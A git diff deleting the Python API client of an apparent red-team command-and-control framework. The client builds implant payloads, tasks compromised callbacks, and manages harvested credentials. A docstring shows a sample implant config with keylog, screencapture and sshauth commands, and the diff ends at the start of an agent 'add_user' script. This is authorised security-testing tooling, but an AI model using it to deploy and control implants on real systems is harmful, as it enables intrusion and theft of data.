self.get_json(url) - if resp.response_code == 200: - resp.response = Operator(**resp.response) - return resp - - async def create_operator(self, operator: Operator) -> MythicResponse: - """ - Creates a new operator with the specified username and password. - If the operator name already exists, just returns information about that operator. - """ - url = "{}{}:{}/api/v{}/operators".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json( - url, data={"username": operator.username, "password": operator.password} - ) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operator(**resp.response) - elif resp.status == "error": - resp = await self.get_operator(operator) - if resp.status == "success": - return resp - raise Exception("Unable to create operator and no active operator found: " + json.dumps(resp, indent=2, default=lambda o: o.to_json())) - return resp - - async def update_operator(self, operator: Operator) -> MythicResponse: - """ - Updates information about the specified operator. - """ - if operator.id is None: - resp = await self.get_operator(operator) - if resp.status == "error": - raise Exception("Failed to get_operator in update_operator") - operator.id = resp.response.id - url = "{}{}:{}/api/v{}/operators/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operator.id), - ) - resp = await self.put_json(url, data=await obj_to_json(operator)) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operator(**resp.response) - return resp - - # ================== APITOKEN ENDPOINTS ====================== - - async def get_apitokens(self) -> MythicResponse: - """ - Gets all of the user's API tokens in a List - :return: - """ - url = "{}{}:{}/api/v{}/apitokens".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response with APIToken objects instead of just a dictionary - resp.response = [APIToken(**x) for x in resp.response["apitokens"]] - return resp - - async def create_apitoken(self, token_type="User") -> MythicResponse: - """ - Creates an API token for the user - :param token_type: - must be either "User" or "C2" - :return: - """ - # token_type should be C2 or User - url = "{}{}:{}/api/v{}/apitokens".format( - self._http, self._server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data={"token_type": token_type}) - if resp.response_code == 200 and resp.status == "success": - # update the response to be an object - resp.response = APIToken(**resp.response) - return resp - - async def remove_apitoken(self, apitoken: Union[APIToken, Dict]) -> MythicResponse: - """ - Removes the specified API token and invalidates it going forward - :param apitoken: - if using the APIToken class, the following must be set: - id - :return: - """ - # take in an object and parse it if the value isn't explicitly given - url = "{}{}:{}/api/v{}/apitokens/{}".format( - self._http, - self._server_ip, - self._server_port, - self._server_api_version, - str(apitoken.id if isinstance(apitoken, APIToken) else apitoken["id"]), - ) - resp = await self.delete_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response to ben an object - resp.response = APIToken(**resp.response) - return resp - - # ================= PAYLOAD ENDPOINTS ======================= - - async def get_payloads(self) -> MythicResponse: - """ - Get all the payloads for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/payloads/current_operation".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = [Payload(**x) for x in resp.response] - return resp - - async def remove_payload(self, payload: Union[Payload, Dict]) -> MythicResponse: - """ - Mark a payload as deleted in the database and remove it from disk - Truly removing it from the database would delete any corresponding tasks/callbacks, so we don't do that - :param payload: - :return: - """ - url = "{}{}:{}/api/v{}/payloads/{}".format( - self._http, - self._server_ip, - self._server_port, - self._server_api_version, - str(payload.uuid if isinstance(payload, Payload) else payload["uuid"]), - ) - resp = await self.delete_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response to ben an object - resp.response = Payload(**resp.response) - return resp - - async def create_payload( - self, - payload: Payload, - all_commands: bool = None, - timeout=None, - wait_for_build: bool = None, - ) -> MythicResponse: - """ - :param payload: - - :return: - {"payload_type":"poseidon", - "c2_profiles":[ - {"c2_profile_parameters": - { - "AESPSK":"ElhUTijQn2klOtjlGyxs2uU6oq4PWD2Tboc5qaKzKCg=", - "USER_AGENT":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - "callback_host":"https://domain.com", - "callback_interval":"10", - "callback_jitter":"23", - "callback_port":"80", - "domain_front":"", - "encrypted_exchange_check":"T", - "killdate":"yyyy-mm-dd" - }, - "c2_profile":"HTTP" - }], - "filename":"poseidon.bin", - "tag":"this is my tag yo for initial access", - "commands":["cat","cd","cp","curl","download","drives","exit","getenv","getuser","jobkill","jobs","jxa","keylog","keys","kill","libinject","listtasks","ls","mkdir","mv","portscan","ps","pwd","rm","screencapture","setenv","shell","sleep","socks","sshauth","triagedirectory","unsetenv","upload","xpc"], - "build_parameters":[ - {"name":"mode","value":"default"}, - {"name":"os","value":"darwin"} - ] - }" - """ - data = {} - data["payload_type"] = payload.payload_type.ptype - data["filename"] = payload.filename - data["tag"] = payload.tag - if payload.wrapped_payload is None: - data["c2_profiles"] = [] - for k, v in payload.c2_profiles.items(): - parameters = {i.name: i.value for i in v} - data["c2_profiles"].append( - {"c2_profile": k, "c2_profile_parameters": parameters} - ) - data["build_parameters"] = [] - if all_commands: - if payload.payload_type.id is None: - resp = await self.get_payloadtypes() - for p in resp.response: - if p.ptype == payload.payload_type.ptype: - payload.payload_type = p - resp = await self.get_payloadtype_commands(payload.payload_type) - payload.commands = resp.response - if payload.commands is not None: - data["commands"] = [c.cmd for c in payload.commands] - else: - data["commands"] = [] - if payload.build_parameters is not None: - data['build_parameters'] = payload.build_parameters - if payload.wrapped_payload is not None: - data['wrapped_payload'] = payload.wrapped_payload.uuid - url = "{}{}:{}/api/v{}/payloads/create".format( - self._http, self._server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - # update the response to be an object - # this will be a very basic payload with just the payload UUID - resp.response = Payload(**resp.response) - if wait_for_build is not None and wait_for_build: - status = await self.wait_for_payload_status_change( - resp.response.uuid, "success", timeout - ) - if status is None: - raise Exception( - "Failed to get final payload status from wait_for_payload_status_change in creat_payload" - ) - else: - resp.response = status - return resp - - async def get_one_payload_info( - self, payload: Union[Payload, Dict] - ) -> MythicResponse: - """ - Get information about a specific payload - :param payload: - if using the Payload class, the following must be set: - uuid - :return: - """ - url = "{}{}:{}/api/v{}/payloads/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(payload.uuid if isinstance(payload, Payload) else payload["uuid"]), - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response to ben an object - resp.response = Payload(**resp.response) - return resp - - async def download_payload(self, payload: Union[Payload, Dict]) -> bytes: - """ - Get the final payload for a specified payload - :param payload: - if using Payload class, the following must be set: - uuid - :return: - """ - url = "{}{}:{}/api/v{}/payloads/download/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(payload.uuid if isinstance(payload, Payload) else payload["uuid"]), - ) - resp = await self.get_file(url) - return resp - - # ================= FILE ENDPOINTS ======================= - - async def download_file(self, file: FileMeta) -> bytes: - """ - Download a file that is either scheduled for upload or is finished downloading - """ - url = "{}{}:{}/api/v{}/files/download/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - file.agent_file_id, - ) - resp = await self.get_file(url) - return resp - - # ================ PAYLOAD TYPE ENDPOINTS ==================== - - async def get_payloadtypes(self) -> MythicResponse: - """ - Get all payload types registered with Apfell - :return: - """ - url = "{}{}:{}/api/v{}/payloadtypes/".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - tmp = [] - for x in resp.response["payloads"]: - tmp.append(PayloadType(**x)) - for x in resp.response["wrappers"]: - tmp.append(PayloadType(**x)) - resp.response = tmp - return resp - - async def get_payloadtype( - self, payload_type: Union[PayloadType, Dict] - ) -> MythicResponse: - """ - Get information about a specific payload type - :param payload_type: - if using PayloadType class, the following must be set: - ptype - :return: - """ - url = "{}{}:{}/api/v{}/payloadtypes/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str( - payload_type.id - if isinstance(payload_type, PayloadType) - else payload_type["id"] - ), - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response with APIToken objects instead of just a dictionary - resp.response = PayloadType(**resp.response) - return resp - - async def get_payloadtype_commands( - self, payload_type: Union[PayloadType, Dict] - ) -> MythicResponse: - """ - Get the commands registered for a specific payload type - :param payload_type: - if using PayloadType class, the following must be set: - ptype - :return: - """ - url = "{}{}:{}/api/v{}/payloadtypes/{}/commands".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str( - payload_type.id - if isinstance(payload_type, PayloadType) - else payload_type["id"] - ), - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - resp.response = [Command(**x) for x in resp.response["commands"]] - return resp - - # ================ TASKING ENDPOINTS ======================== - - async def get_all_tasks(self) -> MythicResponse: - """ - Get all of the tasks associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/tasks/".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = [Task(**x) for x in resp.response] - return resp - - async def get_all_tasks_for_callback( - self, callback: Union[Callback, Dict] - ) -> MythicResponse: - """ - Get the tasks (no responses) for a specific callback - :param callback: - if using the Callback class, the following must be set: - id - :return: - """ - url = "{}{}:{}/api/v{}/tasks/callback/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - callback.id if isinstance(callback, Callback) else callback["id"], - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = [Task(**x) for x in resp.response] - return resp - - async def get_all_responses_for_task( - self, task: Union[Task, Dict] - ) -> MythicResponse: - """ - For the specified task, get all the responses - :param task: - if using the Task class, the following must be set: - id - :return: - """ - url = "{}{}:{}/api/v{}/tasks/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - task.id if isinstance(task, Task) else task["id"], - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - tsk = Task(**resp.response["task"]) - tsk.callback = Callback(**resp.response["callback"]) - tsk.responses = [Response(**x) for x in resp.response["responses"]] - resp.response = tsk - return resp - - async def get_all_tasks_and_responses_grouped_by_callback(self) -> MythicResponse: - """ - Get all tasks and responses for all callbacks in the current operation - :return: - """ - url = "{}{}:{}/api/v{}/task_report_by_callback".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = [Callback(**x) for x in resp.response["output"]] - return resp - - async def create_task( - self, task: Task, return_on="preprocessing", timeout=None - ) -> MythicResponse: - """ - Create a new task for a callback - :param task: - if using the Task class, the following must be set: - callback: id - command: cmd - params - :return: - """ - url = "{}{}:{}/api/v{}/tasks/callback/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - task.callback.id if isinstance(task, Task) else task["callback"], - ) - headers = self.get_headers() - if task.files is None: - data = {"command": task.command.cmd} - if isinstance(task.params, str): - data["params"] = task.params - else: - data["params"] = json.dumps(task.params) - try: - async with aiohttp.ClientSession() as session: - async with session.post( - url, json=data, headers=headers, ssl=False - ) as resp: - resp = MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - else: - form = aiohttp.FormData() - data = {"command": task.command.cmd, "params": task.params} - for f in task.files: - data["params"][f.param_name] = "FILEUPLOAD" - form.add_field("file" + f.param_name, f.content, filename=f.filename) - data["params"] = json.dumps(data["params"]) - form.add_field("json", json.dumps(data)) - try: - async with aiohttp.ClientSession() as session: - async with session.post( - url, data=form, headers=headers, ssl=False - ) as resp: - resp = MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - if resp.response_code == 200 and resp.status == "success": - resp.response = Task(**resp.response) - if return_on == "preprocessing": - return resp.response - else: - # we need to loop and wait for the status of the task to change - resp.response = await self.wait_for_task_status_change( - resp.response.id, return_on, timeout - ) - return resp - - async def set_comment_on_task(self, task:Task) -> MythicResponse: - """ - Get all of the credentials associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/tasks/comments/{}".format( - self._http, self.server_ip, self._server_port, self._server_api_version, - task.id - ) - if task.comment == "" or task.comment is None: - resp = await self.delete_json(url) - else: - resp = await self.post_json(url, data={"comment": task.comment}) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = Task(**resp.response['task']) - return resp - - # ============== CREDENTIAL ENDPOINTS ======================== - - async def get_all_credentials(self) -> MythicResponse: - """ - Get all of the credentials associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/credentials/current_operation".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = [Credential(**x) for x in resp.response["credentials"]] - return resp - - async def create_credential(self, credential: Credential) -> MythicResponse: - """ - Create a new credential associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/credentials".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data=await obj_to_json(credential)) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = Credential(**resp.response) - return resp - - async def update_credential(self, credential: Credential) -> MythicResponse: - """ - Create a new credential associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/credentials/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(credential.id), - ) - resp = await self.put_json(url, data=await obj_to_json(credential)) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = Credential(**resp.response) - return resp - - # =============== DISABLED COMMANDS PROFILES ENDPOINTS ======= - - async def get_all_disabled_commands_profiles(self) -> MythicResponse: - """ - Get all of the disabled command profiles associated with Mythic - :return: - """ - url = "{}{}:{}/api/v{}/operations/disabled_commands_profiles".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - profile_entries = [] - for name, ptypes in resp.response["disabled_command_profiles"].items(): - new_entry = DisabledCommandsProfile(name=name, payload_types=[]) - for ptype, commands in ptypes.items(): - payload_type = PayloadType(ptype=ptype, commands=[]) - for command in commands: - payload_type.commands.append( - Command(cmd=command["command"], id=command["command_id"]) - ) - new_entry.payload_types.append(payload_type) - profile_entries.append(new_entry) - resp.response = profile_entries - return resp - - async def create_disabled_commands_profile( - self, profile: DisabledCommandsProfile - ) -> MythicResponse: - """ - Create a new disabled command profiles associated with Mythic - :return: - """ - url = "{}{}:{}/api/v{}/operations/disabled_commands_profile".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - data = {profile.name: {}} - for payload_type in profile.payload_types: - data[profile.name][payload_type.ptype] = [] - for command in payload_type.commands: - data[profile.name][payload_type.ptype].append(command.cmd) - resp = await self.post_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - profile_entries = [] - for entry in resp.response["disabled_command_profile"]: - # first check if we have a profile for this - found = False - for p in profile_entries: - if p.name == entry["name"]: - found = True - ptype_found = False - for payload_type in p.payload_types: - if payload_type.ptype == entry["payload_type"]: - ptype_found = True - payload_type.commands.append( - Command( - cmd=entry["command"], id=entry["command_id"] - ) - ) - if not ptype_found: - p.payload_types.append( - PayloadType( - ptype=entry["payload_type"], - commands=[ - Command( - cmd=entry["command"], id=entry["command_id"] - ) - ], - ) - ) - if not found: - dcp = DisabledCommandsProfile(name=entry["name"], payload_types=[]) - dcp.payload_types.append( - PayloadType( - ptype=entry["payload_type"], - commands=[ - Command(cmd=entry["command"], id=entry["command_id"]) - ], - ) - ) - profile_entries.append(dcp) - resp.response = profile_entries - return resp - - async def update_disabled_commands_profile( - self, profile: DisabledCommandsProfile - ) -> MythicResponse: - """ - Create a new disabled command profiles associated with Mythic - :return: - """ - url = "{}{}:{}/api/v{}/operations/disabled_commands_profile".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - data = {profile.name: {}} - for payload_type in profile.payload_types: - data[profile.name][payload_type.ptype] = [] - for command in payload_type.commands: - data[profile.name][payload_type.ptype].append(command.cmd) - resp = await self.put_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - profile_entries = [] - for entry in resp.response["disabled_command_profile"]: - # first check if we have a profile for this - found = False - for p in profile_entries: - if p.name == entry["name"]: - found = True - ptype_found = False - for payload_type in p.payload_types: - if payload_type.ptype == entry["payload_type"]: - ptype_found = True - payload_type.commands.append( - Command( - cmd=entry["command"], id=entry["command_id"] - ) - ) - if not ptype_found: - p.payload_types.append( - PayloadType( - ptype=entry["payload_type"], - commands=[ - Command( - cmd=entry["command"], id=entry["command_id"] - ) - ], - ) - ) - if not found: - dcp = DisabledCommandsProfile(name=entry["name"], payload_types=[]) - dcp.payload_types.append( - PayloadType( - ptype=entry["payload_type"], - commands=[ - Command(cmd=entry["command"], id=entry["command_id"]) - ], - ) - ) - profile_entries.append(dcp) - resp.response = profile_entries - return resp - - async def update_disabled_commands_profile_for_operator( - self, - profile: Union[DisabledCommandsProfile, str], - operator: Operator, - operation: Operation, - ) -> MythicResponse: - # async def add_or_update_operator_for_operation(self, operation: Operation, operator: Operator) - if isinstance(profile, DisabledCommandsProfile): - operator.base_disabled_commands = profile.name - else: - operator.base_disabled_commands = profile - resp = await self.add_or_update_operator_for_operation(operation, operator) - return resp - - # =============== EVENT LOG MESSAGES ======================== - - async def get_all_event_messages(self) -> MythicResponse: - """ - Get all of the event messages associated with Mythic for the current operation that are not deleted - :return: - """ - url = "{}{}:{}/api/v{}/event_message".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - resp.response = [EventMessage(**x) for x in resp.response["alerts"]] - return resp - - async def create_event_message(self, message: EventMessage) -> MythicResponse: - """ - Create new event message for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/event_message".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data=await obj_to_json(message)) - if resp.response_code == 200 and resp.status == "success": - resp.response = EventMessage(resp.response) - return resp - - async def update_event_message(self, message: EventMessage) -> MythicResponse: - """ - Update event message for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/event_message/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(message.id), - ) - resp = await self.put_json(url, data=await obj_to_json(message)) - if resp.response_code == 200 and resp.status == "success": - resp.response = EventMessage(resp.response) - return resp - - async def remove_event_message(self, message: EventMessage) -> MythicResponse: - """ - Update event message for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/event_message/delete".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data={"messages": [message.id]}) - if resp.response_code == 200 and resp.status == "success": - resp.response = EventMessage(resp.response) - return resp - - async def remove_event_messages(self, messages: List) -> MythicResponse: - """ - Update event message for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/event_message/delete".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - msgs = [m.id for m in messages] - resp = await self.post_json(url, data={"messages": msgs}) - if resp.response_code == 200 and resp.status == "success": - resp.response = EventMessage(resp.response) - return resp - - # ============= CUSTOM HELPER FUNCTIONS ====================== - - async def login(self): - """ - Login with username/password and store resulting access_token and refresh_token - """ - url = "{}{}:{}/auth".format(self._http, self._server_ip, self._server_port) - data = {"username": self.username, "password": self.password} - resp = await self.post_json(url, data) - if resp.response_code == 200: - self._access_token = resp.response["access_token"] - self._refresh_token = resp.response["refresh_token"] - return resp - else: - raise Exception("Failed to log in: " + json.dumps(resp, indent=2, default=lambda o: o.to_json())) - sys.exit(1) - - async def set_or_create_apitoken(self, token_type="User"): - """ - Use current auth to check if there are any user tokens. Either get one or create a new user one - """ - resp = await self.get_apitokens() - if resp.status == "success": - for x in resp.response: - if x.token_type == token_type: - self._apitoken = x - resp.response = x - return resp - # if we get here, then we don't have a token of the right type for us to just leverage, so we need to get one - token_resp = await self.create_apitoken(token_type=token_type) - if token_resp.response_code == 200: - self._apitoken = token_resp.response - return token_resp - - async def wait_for_task_status_change(self, task_id, status, timeout=None): - """ - Uses websockets to listen for notifications related to the specified task within a certain period of time - if self.timeout is -1, then wait indefinitely - :param task_id: - :param status: the status we're waiting for (error is always included) - :return: - """ - if timeout is None: - timeout = self.global_timeout - url = "{}{}:{}/ws/task/{}".format( - self._ws, self._server_ip, self._server_port, str(task_id) - ) - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - ws = await session.ws_connect(url, headers=headers, ssl=False) - start = time() - while True: - try: - if timeout > 0 and (time() - start >= timeout): - raise Exception("wait_for_task_status_change has timed out") - msg = await ws.receive() - if msg.data is None: - return None - if msg.data != "": - task = Task(**json.loads(msg.data)) - if ( - task.status == "error" - or task.completed == True - or task.status.lower() == status.lower() - ): - return task - except Exception as e: - raise Exception("Exception while waiting for task status change: " + str(e)) - except Exception as e: - raise Exception("Exception in outer try/catch while waiting for task status change: " + str(e)) - - async def wait_for_payload_status_change(self, payload_uuid, status, timeout=None): - """ - Uses websockets to listen for notifications related to the specified pyaload within a certain period of time - if self.timeout is -1, then wait indefinitely - :param payload_uuid: - :param status: the status we're waiting for (error is always included) - :return: - """ - if timeout is None: - timeout = self.global_timeout - url = "{}{}:{}/ws/payloads/{}".format( - self._ws, self._server_ip, self._server_port, str(payload_uuid) - ) - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - ws = await session.ws_connect(url, headers=headers, ssl=False) - start = time() - while True: - try: - if timeout > 0 and (time() - start >= timeout): - raise Exception( - "wait_for_payload_status_change has timed out" - ) - msg = await ws.receive() - if msg.data is None: - return None - if msg.data != "": - payload = Payload(**json.loads(msg.data)) - if ( - payload.build_phase == "error" - or payload.deleted == True - or payload.build_phase == status - ): - return payload - except Exception as e: - raise Exception("Exception while waiting for payload status change: " + str(e)) - except Exception as e: - raise Exception("Exception in outer try/catch while waiting for payload status change: " + str(e)) - - # ============= WEBSOCKET NOTIFICATION FUNCTIONS =============== - - async def listen_for_all_notifications_on_one_callback( - self, callback_id, callback_function=None, timeout=None - ): - """ - Uses websockets to listen for all notifications related to a specific callback and prints to the screen. - To stop listening, call cancel() on the result from this function call - :param callback_id: - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/unified_callback/{}".format( - self._ws, self._server_ip, self._server_port, str(callback_id) - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_callbacks(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all notifications related new callbacks. - To stop listening, call cancel() on the result from this function call - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/new_callbacks/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_responses_for_task( - self, task_id, callback_function=None, timeout=None - ): - """ - Uses websockets to listen for all responses on a given task - To stop listening, call cancel() on the result from this function call - :param callback_id: - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/responses/by_task/{}".format( - self._ws, self._server_ip, self._server_port, str(task_id) - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def gather_task_responses(self, task_id, timeout=None) -> List: - """ - Uses websockets to listen for all responses related to task_id and gather them together into an array until the task is completed or errored. - :param callback_id: - :param callback_function: gets called on each notification - :return: - """ - if timeout is None: - timeout = self.global_timeout - url = "{}{}:{}/ws/responses/by_task/{}".format( - self._ws, self._server_ip, self._server_port, str(task_id) - ) - headers = self.get_headers() - responses = [] - try: - async with aiohttp.ClientSession() as session: - ws = await session.ws_connect(url, headers=headers, ssl=False) - start = time() - while True: - try: - if timeout > 0 and (time() - start >= timeout): - raise Exception("gather_task_responses has timed out") - msg = await ws.receive() - if msg.data is None: - return responses - if msg.data != "": - rsp = Response(**json.loads(msg.data)) - # await json_print(rsp) - responses.append(rsp) - if rsp.task.status == "error" or rsp.task.completed == True: - return responses - except Exception as e: - raise Exception("Exception while gathering responses: " + str(e)) - except Exception as e: - raise Exception("Exception in our try/catch while gathering responses: " + str(e)) - - async def listen_for_all_files(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all file notifications within mythic for the current operation. - This includes payloads, uploads, downloads, screenshots. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/files/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_files(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all file notifications within mythic for the current operation. - This includes uploads, downloads. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/files/new/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_responses(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all response notifications within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/responses/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_responses(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all new response notifications within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/responses/new/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_tasks(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all tasks within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/tasks/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_tasks(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all new tasks within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/tasks/new/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_payloads(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all payloads within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/payloads/info/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_credentials(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for credentials within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/credentials/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_credentials(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for new credentials within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/credentials/new/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_event_messages(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for event messages within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/events_all/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_event_messages(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for new event messages within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/events_notifier/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task diff --git a/Mythic_CLI/requirements.txt b/Mythic_CLI/requirements.txt deleted file mode 100644 index 97c7886f9..000000000 --- a/Mythic_CLI/requirements.txt +++ /dev/null @@ -1,2 +0,0 @@ -aiohttp -asyncio diff --git a/Payload_Types/poseidon/agent_code/download/.gitkeep b/Payload_Types/.gitkeep old mode 100755 new mode 100644 similarity index 100% rename from Payload_Types/poseidon/agent_code/download/.gitkeep rename to Payload_Types/.gitkeep diff --git a/Payload_Types/apfell/Dockerfile b/Payload_Types/apfell/Dockerfile deleted file mode 100755 index ea00f25c0..000000000 --- a/Payload_Types/apfell/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_payload:0.0.1 \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/add_user.js b/Payload_Types/apfell/agent_code/add_user.js deleted file mode 100755 index 93822561c..000000000 --- a/Payload_Types/apfell/agent_code/add_user.js +++ /dev/null @@ -1,74 +0,0 @@ -exports.add_user = function(task, command, params){ - try{ - // Add a user with dscl to the local machine - let config = 